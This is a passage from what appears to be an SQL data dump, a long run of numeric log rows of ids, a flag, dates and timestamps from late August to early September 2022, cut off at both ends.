19:45:32'),(57599,91,1,'2022-08-30','2022-08-30 19:46:30'),(57600,4893,1,'2022-08-30','2022-08-30 19:47:23'),(57601,4897,1,'2022-08-30','2022-08-30 19:47:23'),(57602,4888,1,'2022-08-30','2022-08-30 19:47:23'),(57603,4542,1,'2022-08-30','2022-08-30 20:00:13'),(57604,1770,1,'2022-08-30','2022-08-30 20:17:06'),(57605,84,1,'2022-08-30','2022-08-30 21:24:19'),(57606,68,1,'2022-08-30','2022-08-30 21:24:32'),(57607,76,1,'2022-08-30','2022-08-30 21:25:39'),(57608,91,1,'2022-08-30','2022-08-30 21:26:06'),(57609,4546,1,'2022-08-30','2022-08-30 21:27:59'),(57610,91,1,'2022-08-30','2022-08-30 22:12:10'),(57611,3257,1,'2022-08-31','2022-08-31 00:52:46'),(57612,4608,1,'2022-08-31','2022-08-31 01:00:07'),(57613,3092,1,'2022-08-31','2022-08-31 01:04:29'),(57614,1722,1,'2022-08-31','2022-08-31 01:06:20'),(57615,1722,1,'2022-08-31','2022-08-31 01:06:39'),(57616,1722,1,'2022-08-31','2022-08-31 01:07:10'),(57617,1722,1,'2022-08-31','2022-08-31 01:07:51'),(57618,4377,1,'2022-08-31','2022-08-31 01:19:48'),(57619,80,1,'2022-08-31','2022-08-31 01:34:02'),(57620,80,1,'2022-08-31','2022-08-31 01:34:39'),(57621,2410,1,'2022-08-31','2022-08-31 01:34:55'),(57622,4911,1,'2022-08-31','2022-08-31 02:16:31'),(57623,1707,1,'2022-08-31','2022-08-31 02:54:36'),(57624,1707,1,'2022-08-31','2022-08-31 02:55:54'),(57625,3030,1,'2022-08-31','2022-08-31 05:45:34'),(57626,4400,1,'2022-08-31','2022-08-31 06:40:39'),(57627,76,1,'2022-08-31','2022-08-31 06:41:24'),(57628,1734,1,'2022-08-31','2022-08-31 06:57:31'),(57629,1612,1,'2022-08-31','2022-08-31 07:00:31'),(57630,3102,1,'2022-08-31','2022-08-31 07:33:18'),(57631,467,1,'2022-08-31','2022-08-31 08:23:46'),(57632,3102,1,'2022-08-31','2022-08-31 08:58:26'),(57633,570,1,'2022-08-31','2022-08-31 09:00:42'),(57634,570,1,'2022-08-31','2022-08-31 09:03:28'),(57635,4618,1,'2022-08-31','2022-08-31 09:04:47'),(57636,1699,1,'2022-08-31','2022-08-31 09:10:52'),(57637,1766,1,'2022-08-31','2022-08-31 09:55:56'),(57638,1766,1,'2022-08-31','2022-08-31 09:57:36'),(57639,1766,1,'2022-08-31','2022-08-31 09:57:52'),(57640,1766,1,'2022-08-31','2022-08-31 09:58:39'),(57641,4432,1,'2022-08-31','2022-08-31 10:03:55'),(57642,1766,1,'2022-08-31','2022-08-31 10:06:59'),(57643,1766,1,'2022-08-31','2022-08-31 10:07:06'),(57644,1596,1,'2022-08-31','2022-08-31 10:12:00'),(57645,76,1,'2022-08-31','2022-08-31 10:12:55'),(57646,4930,1,'2022-08-31','2022-08-31 10:13:18'),(57647,4941,1,'2022-08-31','2022-08-31 10:13:56'),(57648,4930,1,'2022-08-31','2022-08-31 10:14:04'),(57649,89,1,'2022-08-31','2022-08-31 10:14:15'),(57650,76,1,'2022-08-31','2022-08-31 10:14:34'),(57651,68,1,'2022-08-31','2022-08-31 10:14:45'),(57652,1766,1,'2022-08-31','2022-08-31 10:15:10'),(57653,76,1,'2022-08-31','2022-08-31 10:16:44'),(57654,89,1,'2022-08-31','2022-08-31 10:16:46'),(57655,4930,1,'2022-08-31','2022-08-31 10:16:48'),(57656,84,1,'2022-08-31','2022-08-31 10:16:59'),(57657,4930,1,'2022-08-31','2022-08-31 10:17:13'),(57658,76,1,'2022-08-31','2022-08-31 10:17:16'),(57659,1596,1,'2022-08-31','2022-08-31 10:17:18'),(57660,1614,1,'2022-08-31','2022-08-31 10:28:36'),(57661,570,1,'2022-08-31','2022-08-31 10:30:49'),(57662,1766,1,'2022-08-31','2022-08-31 10:47:16'),(57663,3030,1,'2022-08-31','2022-08-31 10:48:25'),(57664,2971,1,'2022-08-31','2022-08-31 12:25:15'),(57665,1870,1,'2022-08-31','2022-08-31 12:39:04'),(57666,2971,1,'2022-08-31','2022-08-31 12:47:52'),(57667,1747,1,'2022-08-31','2022-08-31 13:12:54'),(57668,1747,1,'2022-08-31','2022-08-31 13:13:58'),(57669,4651,1,'2022-08-31','2022-08-31 13:21:45'),(57670,4858,1,'2022-08-31','2022-08-31 14:30:21'),(57671,1596,1,'2022-08-31','2022-08-31 14:42:04'),(57672,1544,1,'2022-08-31','2022-08-31 15:10:22'),(57673,1544,1,'2022-08-31','2022-08-31 15:10:22'),(57674,4301,1,'2022-08-31','2022-08-31 16:44:43'),(57675,4966,1,'2022-08-31','2022-08-31 17:44:47'),(57676,4301,1,'2022-08-31','2022-08-31 18:25:27'),(57677,3731,1,'2022-08-31','2022-08-31 21:59:43'),(57678,3731,1,'2022-08-31','2022-08-31 22:02:16'),(57679,4524,1,'2022-08-31','2022-08-31 23:53:30'),(57680,1728,1,'2022-09-01','2022-09-01 02:34:42'),(57681,3764,1,'2022-09-01','2022-09-01 02:38:28'),(57682,3124,1,'2022-09-01','2022-09-01 03:22:36'),(57683,4654,1,'2022-09-01','2022-09-01 05:20:24'),(57684,4765,1,'2022-09-01','2022-09-01 05:20:29'),(57685,3738,1,'2022-09-01','2022-09-01 05:20:34'),(57686,3489,1,'2022-09-01','2022-09-01 05:20:38'),(57687,4697,1,'2022-09-01','2022-09-01 05:20:42'),(57688,4648,1,'2022-09-01','2022-09-01 05:20:46'),(57689,2801,1,'2022-09-01','2022-09-01 05:20:51'),(57690,3710,1,'2022-09-01','2022-09-01 05:20:55'),(57691,4338,1,'2022-09-01','2022-09-01 05:21:00'),(57692,4329,1,'2022-09-01','2022-09-01 05:21:05'),(57693,4977,1,'2022-09-01','2022-09-01 05:21:10'),(57694,4706,1,'2022-09-01','2022-09-01 05:21:14'),(57695,3117,1,'2022-09-01','2022-09-01 05:21:20'),(57696,3069,1,'2022-09-01','2022-09-01 05:21:24'),(57697,4709,1,'2022-09-01','2022-09-01 05:21:30'),(57698,3030,1,'2022-09-01','2022-09-01 05:21:34'),(57699,3290,1,'2022-09-01','2022-09-01 05:21:39'),(57700,3066,1,'2022-09-01','2022-09-01 05:21:43'),(57701,3045,1,'2022-09-01','2022-09-01 05:21:47'),(57702,3714,1,'2022-09-01','2022-09-01 05:21:51'),(57703,4663,1,'2022-09-01','2022-09-01 05:21:55'),(57704,4551,1,'2022-09-01','2022-09-01 05:22:00'),(57705,4651,1,'2022-09-01','2022-09-01 05:22:05'),(57706,3027,1,'2022-09-01','2022-09-01 05:22:09'),(57707,4768,1,'2022-09-01','2022-09-01 05:22:14'),(57708,4753,1,'2022-09-01','2022-09-01 05:22:18'),(57709,4983,1,'2022-09-01','2022-09-01 05:22:23'),(57710,3060,1,'2022-09-01','2022-09-01 05:22:27'),(57711,4668,1,'2022-09-01','2022-09-01 05:22:31'),(57712,2813,1,'2022-09-01','2022-09-01 05:22:35'),(57713,4454,1,'2022-09-01','2022-09-01 05:22:40'),(57714,4674,1,'2022-09-01','2022-09-01 05:22:44'),(57715,3316,1,'2022-09-01','2022-09-01 05:22:48'),(57716,3727,1,'2022-09-01','2022-09-01 05:22:54'),(57717,3746,1,'2022-09-01','2022-09-01 05:22:58'),(57718,3307,1,'2022-09-01','2022-09-01 05:23:02'),(57719,3498,1,'2022-09-01','2022-09-01 05:23:06'),(57720,4988,1,'2022-09-01','2022-09-01 05:23:11'),(57721,4323,1,'2022-09-01','2022-09-01 05:23:15'),(57722,4520,1,'2022-09-01','2022-09-01 05:23:19'),(57723,3774,1,'2022-09-01','2022-09-01 05:23:24'),(57724,3127,1,'2022-09-01','2022-09-01 05:23:28'),(57725,4681,1,'2022-09-01','2022-09-01 05:23:32'),(57726,3297,1,'2022-09-01','2022-09-01 05:23:36'),(57727,3090,1,'2022-09-01','2022-09-01 05:23:40'),(57728,3072,1,'2022-09-01','2022-09-01 05:23:44'),(57729,4645,1,'2022-09-01','2022-09-01 05:23:49'),(57730,2809,1,'2022-09-01','2022-09-01 05:23:53'),(57731,4756,1,'2022-09-01','2022-09-01 05:23:57'),(57732,4694,1,'2022-09-01','2022-09-01 05:24:01'),(57733,3749,1,'2022-09-01','2022-09-01 05:24:06'),(57734,4712,1,'2022-09-01','2022-09-01 05:24:10'),(57735,3063,1,'2022-09-01','2022-09-01 05:24:14'),(57736,4566,1,'2022-09-01','2022-09-01 05:24:19'),(57737,4703,1,'2022-09-01','2022-09-01 05:24:23'),(57738,4741,1,'2022-09-01','2022-09-01 05:24:27'),(57739,4688,1,'2022-09-01','2022-09-01 05:24:31'),(57740,4335,1,'2022-09-01','2022-09-01 05:24:35'),(57741,4722,1,'2022-09-01','2022-09-01 05:24:40'),(57742,3735,1,'2022-09-01','2022-09-01 05:24:44'),(57743,4332,1,'2022-09-01','2022-09-01 05:24:48'),(57744,2956,1,'2022-09-01','2022-09-01 05:24:53'),(57745,4275,1,'2022-09-01','2022-09-01 05:24:58'),(57746,4976,1,'2022-09-01','2022-09-01 05:25:02'),(57747,2911,1,'2022-09-01','2022-09-01 05:25:08'),(57748,4744,1,'2022-09-01','2022-09-01 05:25:12'),(57749,4771,1,'2022-09-01','2022-09-01 05:25:17'),(57750,4691,1,'2022-09-01','2022-09-01 05:25:21'),(57751,4747,1,'2022-09-01','2022-09-01 05:25:25'),(57752,3721,1,'2022-09-01','2022-09-01 05:25:30'),(57753,3534,1,'2022-09-01','2022-09-01 05:25:34'),(57754,3752,1,'2022-09-01','2022-09-01 05:25:39'),(57755,4341,1,'2022-09-01','2022-09-01 05:25:44'),(57756,4514,1,'2022-09-01','2022-09-01 05:25:50'),(57757,3731,1,'2022-09-01','2022-09-01 05:25:55'),(57758,3313,1,'2022-09-01','2022-09-01 05:25:59'),(57759,4517,1,'2022-09-01','2022-09-01 05:26:04'),(57760,4750,1,'2022-09-01','2022-09-01 05:26:08'),(57761,4660,1,'2022-09-01','2022-09-01 05:26:12'),(57762,3023,1,'2022-09-01','2022-09-01 05:26:17'),(57763,3486,1,'2022-09-01','2022-09-01 05:26:21'),(57764,4980,1,'2022-09-01','2022-09-01 05:26:26'),(57765,3038,1,'2022-09-01','2022-09-01 05:26:32'),(57766,4657,1,'2022-09-01','2022-09-01 05:26:38'),(57767,3777,1,'2022-09-01','2022-09-01 05:26:42'),(57768,3531,1,'2022-09-01','2022-09-01 05:26:47'),(57769,4677,1,'2022-09-01','2022-09-01 05:26:52'),(57770,4685,1,'2022-09-01','2022-09-01 05:26:56'),(57771,4700,1,'2022-09-01','2022-09-01 05:27:01'),(57772,3430,1,'2022-09-01','2022-09-01 05:27:05'),(57773,3438,1,'2022-09-01','2022-09-01 05:27:09'),(57774,3124,1,'2022-09-01','2022-09-01 05:27:15'),(57775,3724,1,'2022-09-01','2022-09-01 05:27:21'),(57776,4326,1,'2022-09-01','2022-09-01 05:27:27'),(57777,3034,1,'2022-09-01','2022-09-01 05:27:32'),(57778,4759,1,'2022-09-01','2022-09-01 05:27:37'),(57779,4762,1,'2022-09-01','2022-09-01 05:27:43'),(57780,4582,1,'2022-09-01','2022-09-01 05:27:50'),(57781,4400,1,'2022-09-01','2022-09-01 05:28:11'),(57782,3771,1,'2022-09-01','2022-09-01 05:28:31'),(57783,68,1,'2022-09-01','2022-09-01 06:09:24'),(57784,1596,1,'2022-09-01','2022-09-01 06:12:29'),(57785,3072,1,'2022-09-01','2022-09-01 07:39:30'),(57786,4566,1,'2022-09-01','2022-09-01 07:50:12'),(57787,4566,1,'2022-09-01','2022-09-01 07:50:23'),(57788,1588,1,'2022-09-01','2022-09-01 08:39:06'),(57789,1588,1,'2022-09-01','2022-09-01 08:39:19'),(57790,1594,1,'2022-09-01','2022-09-01 09:26:11'),(57791,3771,1,'2022-09-01','2022-09-01 09:32:40'),(57792,3060,1,'2022-09-01','2022-09-01 10:53:52'),(57793,80,1,'2022-09-01','2022-09-01 10:54:11'),(57794,3060,1,'2022-09-01','2022-09-01 10:56:08'),(57795,3060,1,'2022-09-01','2022-09-01 10:58:33'),(57796,1594,1,'2022-09-01','2022-09-01 11:23:56'),(57797,1596,1,'2022-09-01','2022-09-01 11:30:48'),(57798,1600,1,'2022-09-01','2022-09-01 11:56:32'),(57799,4845,1,'2022-09-01','2022-09-01 11:59:41'),(57800,4436,1,'2022-09-01','2022-09-01 12:32:27'),(57801,1544,1,'2022-09-01','2022-09-01 12:56:18'),(57802,1544,1,'2022-09-01','2022-09-01 12:56:20'),(57803,4930,1,'2022-09-01','2022-09-01 13:59:04'),(57804,2748,1,'2022-09-01','2022-09-01 15:02:45'),(57805,1870,1,'2022-09-01','2022-09-01 15:06:28'),(57806,1594,1,'2022-09-01','2022-09-01 15:25:37'),(57807,68,1,'2022-09-01','2022-09-01 16:16:32'),(57808,1596,1,'2022-09-01','2022-09-01 16:19:02'),(57809,68,1,'2022-09-01','2022-09-01 17:01:12'),(57810,68,1,'2022-09-01','2022-09-01 17:45:47'),(57811,4412,1,'2022-09-01','2022-09-01 18:10:01'),(57812,4963,1,'2022-09-01','2022-09-01 18:39:05'),(57813,1588,1,'2022-09-01','2022-09-01 18:47:49'),(57814,1588,1,'2022-09-01','2022-09-01 18:48:15'),(57815,1602,1,'2022-09-01','2022-09-01 20:07:40'),(57816,4457,1,'2022-09-01','2022-09-01 22:22:22'),(57817,3271,1,'2022-09-01','2022-09-01 22:25:27'),(57818,4566,1,'2022-09-01','2022-09-01 22:43:04'),(57819,4988,1,'2022-09-01','2022-09-01 22:54:33'),(57820,2159,1,'2022-09-01','2022-09-01 22:55:37'),(57821,1600,1,'2022-09-02','2022-09-02 00:03:37'),(57822,4520,1,'2022-09-02','2022-09-02 00:59:31'),(57823,80,1,'2022-09-02','2022-09-02 01:09:57'),(57824,80,1,'2022-09-02','2022-09-02 01:10:02'),(57825,4694,1,'2022-09-02','2022-09-02 01:43:31'),(57826,1598,1,'2022-09-02','2022-09-02 01:49:55'),(57827,68,1,'2022-09-02','2022-09-02 02:21:46'),(57828,1544,1,'2022-09-02','2022-09-02 02:50:52'),(57829,3072,1,'2022-09-02','2022-09-02 03:06:39'),(57830,1588,1,'2022-09-02','2022-09-02 04:46:48'),(57831,1588,1,'2022-09-02','2022-09-02 04:46:53'),(57832,2609,1,'2022-09-02','2022-09-02 06:00:07'),(57833,2609,1,'2022-09-02','2022-09-02 06:00:18'),(57834,1588,1,'2022-09-02','2022-09-02 06:06:18'),(57835,3063,1,'2022-09-02','2022-09-02 06:48:53'),(57836,4988,1,'2022-09-02','2022-09-02 07:59:39'),(57837,467,1,'2022-09-02','2022-09-02 08:59:57'),(57838,3090,1,'2022-09-02','2022-09-02 09:42:56'),(57839,4412,1,'2022-09-02','2022-09-02 10:04:28'),(57840,467,1,'2022-09-02','2022-09-02 10:05:53'),(57841,4412,1,'2022-09-02','2022-09-02 10:14:15'),(57842,68,1,'2022-09-02','2022-09-02 10:26:54'),(57843,68,1,'2022-09-02','2022-09-02 10:46:40'),(57844,2769,1,'2022-09-02','2022-09-02 10:46:41'),(57845,68,1,'2022-09-02','2022-09-02 11:44:19'),(57846,1722,1,'2022-09-02','2022-09-02 11:49:21'),(57847,1722,1,'2022-09-02','2022-09-02 11:54:44'),(57848,1722,1,'2022-09-02','2022-09-02 11:56:02'),(57849,1544,1,'2022-09-02','2022-09-02 12:28:08'),(57850,4966,1,'2022-09-02','2022-09-02 12:44:35'),(57851,76,1,'2022-09-02','2022-09-02 12:45:15'),(57852,3102,1,'2022-09-02','2022-09-02 13:30:48'),(57853,1544,1,'2022-09-02','2022-09-02 13:41:37'),(57854,1544,1,'2022-09-02','2022-09-02 13:41:38'),(57855,76,1,'2022-09-02','2022-09-02 14:01:35'),(57856,1770,1,'2022-09-02','2022-09-02 14:01:42'),(57857,1770,1,'2022-09-02','2022-09-02 14:02:04'),(57858,1770,1,'2022-09-02','2022-09-02 14:02:20'),(57859,1770,1,'2022-09-02','2022-09-02 14:02:45'),(57860,68,1,'2022-09-02','2022-09-02 14:13:34'),(57861,1588,1,'2022-09-02','2022-09-02 14:13:35'),(57862,2558,1,'2022-09-02','2022-09-02 14:13:38'),(57863,1596,1,'2022-09-02','2022-09-02 14:41:39'),(57864,1596,1,'2022-09-02','2022-09-02 14:41:40'),(57865,467,1,'2022-09-02','2022-09-02 15:27:47'),(57866,570,1,'2022-09-02','2022-09-02 15:41:44'),(57867,3072,1,'2022-09-02','2022-09-02 15:43:36'),(57868,4608,1,'2022-09-02','2022-09-02 15:43:57'),(57869,76,1,'2022-09-02','2022-09-02 15:45:03'),(57870,2159,1,'2022-09-02','2022-09-02 16:18:37'),(57871,4845,1,'2022-09-02','2022-09-02 16:27:56'),(57872,4524,1,'2022-09-02','2022-09-02 16:45:10'),(57873,4524,1,'2022-09-02','2022-09-02 16:45:12'),(57874,1722,1,'2022-09-02','2022-09-02 17:18:49'),(57875,1722,1,'2022-09-02','2022-09-02 17:18:59'),(57876,4960,1,'2022-09-02','2022-09-02 17:30:31'),(57877,108,1,'2022-09-02','2022-09-02 18:02:40'),(57878,108,1,'2022-09-02','2022-09-02 18:02:43'),(57879,108,1,'2022-09-02','2022-09-02 18:02:44'),(57880,108,1,'2022-09-02','2022-09-02 18:05:20'),(57881,80,1,'2022-09-02','2022-09-02 18:05:49'),(57882,4719,1,'2022-09-02','2022-09-02 18:25:55'),(57883,4719,1,'2022-09-02','2022-09-02 18:26:12'),(57884,108,1,'2022-09-02','2022-09-02 18:47:16'),(57885,4420,1,'2022-09-02','2022-09-02 18:59:31'),(57886,4420,1,'2022-09-02','2022-09-02 18:59:33'),(57887,4457,1,'2022-09-02','2022-09-02 19:31:02'),(57888,2911,1,'2022-09-02','2022-09-02 19:50:42'),(57889,2178,1,'2022-09-02','2022-09-02 19:58:21'),(57890,89,1,'2022-09-02','2022-09-02 20:00:28'),(57891,91,1,'2022-09-02','2022-09-02 20:03:43'),(57892,4556,1,'2022-09-02','2022-09-02 20:06:18'),(57893,4756,1,'2022-09-02','2022-09-02 20:06:42'),(57894,91,1,'2022-09-02','2022-09-02 20:18:53'),(57895,3271,1,'2022-09-02','2022-09-02 20:19:49'),(57896,91,1,'2022-09-02','2022-09-02 20:21:27'),(57897,1776,1,'2022-09-02','2022-09-02 20:22:05'),(57898,1776,1,'2022-09-02','2022-09-02 20:22:16'),(57899,1776,1,'2022-09-02','2022-09-02 20:22:27'),(57900,91,1,'2022-09-02','2022-09-02 20:25:08'),(57901,4546,1,'2022-09-02','2022-09-02 22:00:36'),(57902,3738,1,'2022-09-02','2022-09-02 22:25:33'),(57903,3738,1,'2022-09-02','2022-09-02 22:25:40'),(57904,1728,1,'2022-09-02','2022-09-02 23:03:41'),(57905,1728,1,'2022-09-02','2022-09-02 23:03:44'),(57906,467,1,'2022-09-02','2022-09-02 23:42:10'),(57907,1582,1,'2022-09-02','2022-09-02 23:43:44'),(57908,68,1,'2022-09-03','2022-09-03 00:09:14'),(57909,1596,1,'2022-09-03','2022-09-03 00:09:16'),(57910,1596,1,'2022-09-03','2022-09-03 00:09:17'),(57911,68,1,'2022-09-03','2022-09-03 00:09:30'),(57912,4587,1,'2022-09-03','2022-09-03 00:12:46'),(57913,2309,1,'2022-09-03','2022-09-03 03:40:19'),(57914,3180,1,'2022-09-03','2022-09-03 03:53:43'),(57915,3180,1,'2022-09-03','2022-09-03 03:53:48'),(57916,1582,1,'2022-09-03','2022-09-03 05:10:21'),(57917,2309,1,'2022-09-03','2022-09-03 07:19:41'),(57918,1544,1,'2022-09-03','2022-09-03 07:23:45'),(57919,3764,1,'2022-09-03','2022-09-03 07:58:13'),(57920,3764,1,'2022-09-03','2022-09-03 08:08:08'),(57921,3267,1,'2022-09-03','2022-09-03 08:31:57'),(57922,467,1,'2022-09-03','2022-09-03 08:54:35'),(57923,1596,1,'2022-09-03','2022-09-03 09:10:26'),(57924,1544,1,'2022-09-03','2022-09-03 10:23:45'),(57925,4424,1,'2022-09-03','2022-09-03 11:00:04'),(57926,4424,1,'2022-09-03','2022-09-03 11:00:06'),(57927,4424,1,'2022-09-03','2022-09-03 11:00:07'),(57928,1608,1,'2022-09-03','2022-09-03 11:13:56'),(57929,3069,1,'2022-09-03','2022-09-03 12:05:43'),(57930,1588,1,'2022-09-03','2022-09-03 13:49:10'),(57931,335,1,'2022-09-03','2022-09-03 16:16:52'),(57932,68,1,'2022-09-03','2022-09-03 16:21:26'),(57933,1718,1,'2022-09-03','2022-09-03 16:32:41'),(57934,4753,1,'2022-09-03','2022-09-03 16:35:25'),(57935,89,1,'2022-09-03','2022-09-03 18:10:03'),(57936,89,1,'2022-09-03','2022-09-03 18:10:55'),(57937,2704,1,'2022-09-03','2022-09-03 18:12:40'),(57938,89,1,'2022-09-03','2022-09-03 18:16:46'),(57939,4930,1,'2022-09-03','2022-09-03 18:16:57'),(57940,4911,1,'2022-09-03','2022-09-03 18:17:46'),(57941,4520,1,'2022-09-03','2022-09-03 18:18:20'),(57942,4759,1,'2022-09-03','2022-09-03 18:20:14'),(57943,4520,1,'2022-09-03','2022-09-03 18:23:03'),(57944,3764,1,'2022-09-03','2022-09-03 18:53:43'),(57945,1596,1,'2022-09-03','2022-09-03 19:16:04'),(57946,1596,1,'2022-09-03','2022-09-03 19:16:15'),(57947,3313,1,'2022-09-03','2022-09-03 19:55:36'),(57948,3107,1,'2022-09-03','2022-09-03 20:01:04'),(57949,3107,1,'2022-09-03','2022-09-03 20:19:56'),(57950,1596,1,'2022-09-03','2022-09-03 20:46:04'),(57951,4566,1,'2022-09-03','2022-09-03 21:05:23'),(57952,4566,1,'2022-09-03','2022-09-03 21:06:26'),(57953,3030,1,'2022-09-03','2022-09-03 21:15:20'),(57954,1774,1,'2022-09-03','2022-09-03 21:28:54'),(57955,4566,1,'2022-09-03','2022-09-03 22:35:37'),(57956,87,1,'2022-09-04','2022-09-04 00:07:54'),(57957,1612,1,'2022-09-04','2022-09-04 00:35:48'),(57958,3030,1,'2022-09-04','2022-09-04 00:54:18'),(57959,1612,1,'2022-09-04','2022-09-04 01:05:27'),(57960,3764,1,'2022-09-04','2022-09-04 05:09:43'),(57961,3313,1,'2022-09-04','2022-09-04 05:24:42'),(57962,3313,1,'2022-09-04','2022-09-04 05:24:52'),(57963,4457,1,'2022-09-04','2022-09-04 05:38:22'),(57964,3030,1,'2022-09-04','2022-09-04 05:52:30'),(57965,3030,1,'2022-09-04','2022-09-04 05:52:31'),(57966,2309,1,'2022-09-04','2022-09-04 06:08:49'),(57967,3781,1,'2022-09-04','2022-09-04 06:22:35'),(57968,2457,1,'2022-09-04','2022-09-04 06:52:31'),(57969,1776,1,'2022-09-04','2022-09-04 07:02:28'),(57970,1705,1,'2022-09-04','2022-09-04 09:12:59'),(57971,1745,1,'2022-09-04','2022-09-04 09:53:34'),(57972,4416,1,'2022-09-04','2022-09-04 13:54:05'),(57973,4694,1,'2022-09-04','2022-09-04 13:54:49'),(57974,4988,1,'2022-09-04','2022-09-04 14:11:36'),(57975,3257,1,'2022-09-04','2022-09-04 15:22:32'),(57976,76,1,'2022-09-04','2022-09-04 15:30:45'),(57977,76,1,'2022-09-04','2022-09-04 15:40:54'),(57978,3117,1,'2022-09-04','2022-09-04 17:21:12'),(57979,4329,1,'2022-09-04','2022-09-04 17:54:45'),(57980,4329,1,'2022-09-04','2022-09-04 17:54:51'),(57981,4938,1,'2022-09-04','2022-09-04 18:00:09'),(57982,4938,1,'2022-09-04','2022-09-04 18:00:11'),(57983,4709,1,'2022-09-04','2022-09-04 18:01:40'),(57984,2751,1,'2022-09-04','2022-09-04 19:39:53'),(57985,80,1,'2022-09-04','2022-09-04 22:15:08'),(57986,4753,1,'2022-09-04','2022-09-04 22:19:31'),(57987,4412,1,'2022-09-05','2022-09-05 01:18:18'),(57988,4400,1,'2022-09-05','2022-09-05 01:36:32'),(57989,1596,1,'2022-09-05','2022-09-05 02:14:20'),(57990,1596,1,'2022-09-05','2022-09-05 02:19:30'),(57991,1602,1,'2022-09-05','2022-09-05 03:07:32'),(57992,1602,1,'2022-09-05','2022-09-05 03:39:06'),(57993,1774,1,'2022-09-05','2022-09-05 04:12:42'),(57994,1734,1,'2022-09-05','2022-09-05 04:33:52'),(57995,1734,1,'2022-09-05','2022-09-05 04:35:19'),(57996,1604,1,'2022-09-05','2022-09-05 05:25:31'),(57997,4238,1,'2022-09-05','2022-09-05 06:19:44'),(57998,4238,1,'2022-09-05','2022-09-05 06:20:22'),(57999,2410,1,'2022-09-05','2022-09-05 06:29:25'),(58000,4412,1,'2022-09-05','2022-09-05 06:59:18'),(58001,1724,1,'2022-09-05','2022-09-05 06:59:18'),(58002,4412,1,'2022-09-05','2022-09-05 06:59:20'),(58003,1724,1,'2022-09-05','2022-09-05 06:59:20'),(58004,76,1,'2022-09-05','2022-09-05 07:00:13'),(58005,76,1,'2022-09-05','2022-09-05 07:00:24'),(58006,1544,1,'2022-09-05','2022-09-05 07:02:24'),(58007,1544,1,'2022-09-05','2022-09-05 07:07:01'),(58008,2410,1,'2022-09-05','2022-09-05 07:59:22'),(58009,4335,1,'2022-09-05','2022-09-05 08:06:17'),(58010,4657,1,'2022-09-05','2022-09-05 08:27:32'),(58011,3781,1,'2022-09-05','2022-09-05 08:27:59'),(58012,4587,1,'2022-09-05','2022-09-05 08:55:31'),(58013,3079,1,'2022-09-05','2022-09-05 09:26:24'),(58014,3045,1,'2022-09-05','2022-09-05 09:33:57'),(58015,3045,1,'2022-09-05','2022-09-05 09:39:21'),(58016,4750,1,'2022-09-05','2022-09-05 10:24:44'),(58017,4750,1,'2022-09-05','2022-09-05 10:24:46'),(58018,4368,1,'2022-09-05','2022-09-05 10:58:14'),(58019,1766,1,'2022-09-05','2022-09-05 11:54:00'),(58020,1766,1,'2022-09-05','2022-09-05 11:55:00'),(58021,1766,1,'2022-09-05','2022-09-05 11:55:40'),(58022,1596,1,'2022-09-05','2022-09-05 12:37:09'),(58023,4412,1,'2022-09-05','2022-09-05 12:40:07'),(58024,1766,1,'2022-09-05','2022-09-05 13:00:37'),(58025,1766,1,'2022-09-05','2022-09-05 13:02:29'),(58026,4420,1,'2022-09-05','2022-09-05 13:13:35'),(58027,4457,1,'2022-09-05','2022-09-05 13:16:36'),(58028,2297,1,'2022-09-05','2022-09-05 13:20:17'),(58029,1602,1,'2022-09-05','2022-09-05 13:21:42'),(58030,1596,1,'2022-09-05','2022-09-05 13:21:57'),(58031,1596,1,'2022-09-05','2022-09-05 13:21:59'),(58032,4238,1,'2022-09-05','2022-09-05 13:42:43'),(58033,1598,1,'2022-09-05','2022-09-05 13:43:25'),(58034,4694,1,'2022-09-05','2022-09-05 14:20:12'),(58035,3731,1,'2022-09-05','2022-09-05 14:55:32'),(58036,1722,1,'2022-09-05','2022-09-05 15:23:26'),(58037,1728,1,'2022-09-05','2022-09-05 15:39:58'),(58038,1718,1,'2022-09-05','2022-09-05 15:52:24'),(58039,4335,1,'2022-09-05','2022-09-05 16:06:14'),(58040,4335,1,'2022-09-05','2022-09-05 16:06:19'),(58041,2769,1,'2022-09-05','2022-09-05 18:54:29'),(58042,2503,1,'2022-09-05','2022-09-05 19:56:07'),(58043,4373,1,'2022-09-05','2022-09-05 21:24:11'),(58044,476,1,'2022-09-05','2022-09-05 22:27:58'),(58045,1544,1,'2022-09-05','2022-09-05 22:47:11'),(58046,2775,1,'2022-09-06','2022-09-06 01:48:20'),(58047,2775,1,'2022-09-06','2022-09-06 02:09:13'),(58048,2775,1,'2022-09-06','2022-09-06 02:11:54'),(58049,4587,1,'2022-09-06','2022-09-06 02:29:30'),(58050,1590,1,'2022-09-06','2022-09-06 03:53:48'),(58051,3706,1,'2022-09-06','2022-09-06 03:54:00'),(58052,3706,1,'2022-09-06','2022-09-06 03:54:02'),(58053,1590,1,'2022-09-06','2022-09-06 03:54:05'),(58054,570,1,'2022-09-06','2022-09-06 03:54:07'),(58055,2769,1,'2022-09-06','2022-09-06 04:15:39'),(58056,472,1,'2022-09-06','2022-09-06 04:17:44'),(58057,4520,1,'2022-09-06','2022-09-06 04:34:52'),(58058,3534,1,'2022-09-06','2022-09-06 04:49:16'),(58059,3534,1,'2022-09-06','2022-09-06 04:49:45'),(58060,4520,1,'2022-09-06','2022-09-06 04:54:36'),(58061,4520,1,'2022-09-06','2022-09-06 05:08:29'),(58062,1586,1,'2022-09-06','2022-09-06 05:13:36'),(58063,4420,1,'2022-09-06','2022-09-06 05:21:05'),(58064,3735,1,'2022-09-06','2022-09-06 05:32:37'),(58065,3735,1,'2022-09-06','2022-09-06 05:32:39'),(58066,80,1,'2022-09-06','2022-09-06 05:49:27'),(58067,2293,1,'2022-09-06','2022-09-06 06:58:25'),(58068,3781,1,'2022-09-06','2022-09-06 07:17:53'),(58069,76,1,'2022-09-06','2022-09-06 07:19:01'),(58070,3781,1,'2022-09-06','2022-09-06 07:20:26'),(58071,1598,1,'2022-09-06','2022-09-06 09:00:17'),(58072,468,1,'2022-09-06','2022-09-06 09:03:54'),(58073,1598,1,'2022-09-06','2022-09-06 09:47:49'),(58074,3781,1,'2022-09-06','2022-09-06 10:16:07'),(58075,1544,1,'2022-09-06','2022-09-06 11:00:34'),(58076,3585,1,'2022-09-06','2022-09-06 11:23:09'),(58077,3585,1,'2022-09-06','2022-09-06 11:23:41'),(58078,4420,1,'2022-09-06','2022-09-06 11:45:47'),(58079,4420,1,'2022-09-06','2022-09-06 11:46:12'),(58080,1612,1,'2022-09-06','2022-09-06 12:08:11'),(58081,1612,1,'2022-09-06','2022-09-06 12:09:12'),(58082,335,1,'2022-09-06','2022-09-06 12:16:47'),(58083,4457,1,'2022-09-06','2022-09-06 12:26:15'),(58084,1612,1,'2022-09-06','2022-09-06 